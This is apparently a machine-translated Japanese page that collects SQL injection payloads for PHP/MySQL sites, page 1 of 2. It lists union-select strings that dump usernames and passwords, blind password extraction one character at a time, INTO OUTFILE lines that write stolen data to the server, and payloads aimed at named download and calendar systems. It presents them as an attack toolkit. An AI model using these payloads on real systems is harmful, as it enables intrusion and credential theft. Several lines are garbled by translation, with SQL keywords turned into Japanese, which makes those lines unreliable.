'%23
' および passWord='mypass
id=-1 Union select 1,1,1
id=-1 Union select char(97),char(97),char(97)
id=1 Union select 1メンバーから ,1,1
id=1 管理者から 1,1,1 を選択
id=1 ユーザーから 1,1,1 を選択
userid=1 およびpassword=mypass
userid=1 および Mid(password,3 ,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord 関数は非常に便利です。整数)
' および LENGTH(password)='6 (パスワード長の検出)
' および LEFT(password,1)='m
' および LEFT(password,2)='my
……………を返すことができます。 … …………など
' Union select 1,username,password from user/*
' Union select 1,username,password from user/*
=' Union select 1,username,password from user/* ( 1 または = を直接続けます)
99999' Union select 1,username,password from user/*
' into outfile 'c:/file.txt (エクスポート ファイル)
=' or 1=1 into outfile 'c:/file .txt
1' Union select 1,username,password from user into outfile 'c:/user.txt
selectpassword FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id = ' Union select 1,username,password from user into outfile
id=-1 Union select 1,database(),version() (柔軟なアプリケーションクエリ)
一般的なクエリテストステートメント、
select * FROM table where 1=1
select *from table where 'uuu' = 'uuu'
select*from table where 1 & lt; & gt;
select*from table where 2 & lt; Elect*from table where 1
Select* FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * 1 が NULL でない FROM テーブル
select * NULL が NULL である FROM テーブル
select * 1 と 3 の 2 が一致する FROM テーブル
select * 'a' と 'c' の BETWEEN 'b' がある FROM テーブル
select * FROM table where 2 IN (0,1,2 )
select * FROM table where CASE WHEN 1>0 THEN 1 END
例: Night Cat ダウンロード システム バージョン 1.0
id=1 Union select 1,1,1,1,1, 1,1,1,1,1, 1,1,1,1,1,1,1,1,1
ユニオン選択 1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1, 1,1,1,1 (ymdown_user から)
ユニオン選択 1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1 from ymdown_user where id=1
id=10000 Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1 (id=1 および groupid=1 の ymdown_user から)
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1 from ymdown_user where id=1 (置換、パスワード検索)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (最初のパスワードを確認します)
union select 1,1,1,1,1,1 ,1,1,1,1, 1,1,1,1,1,1,1,1,1 (ymdown_user から) (id=1 および ord(mid(password,2,1))=50 (2 番目の位置)
union select 1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid (パスワード,3,1)) =51
……………………………………………………………………………………
例 2: グレーのトラック変換テスト用の ID (meteor)
union%20(select%20allowsmilies,public,userid ,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order %20by%20eventdate
union%20(select%20allowsmilies,public,userid,' 0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by %20イベント日
現在の 1/2 ページ 12次のページ
上記は、http://www.56.com/m2v/?magic=1 の側面を含む、1/2 ページの http://www.56.com/m2v/?magic=1 高度な PHP インジェクション手法コレクションを紹介しています。 , PHP チュートリアルに興味のある友人の参考になれば幸いです。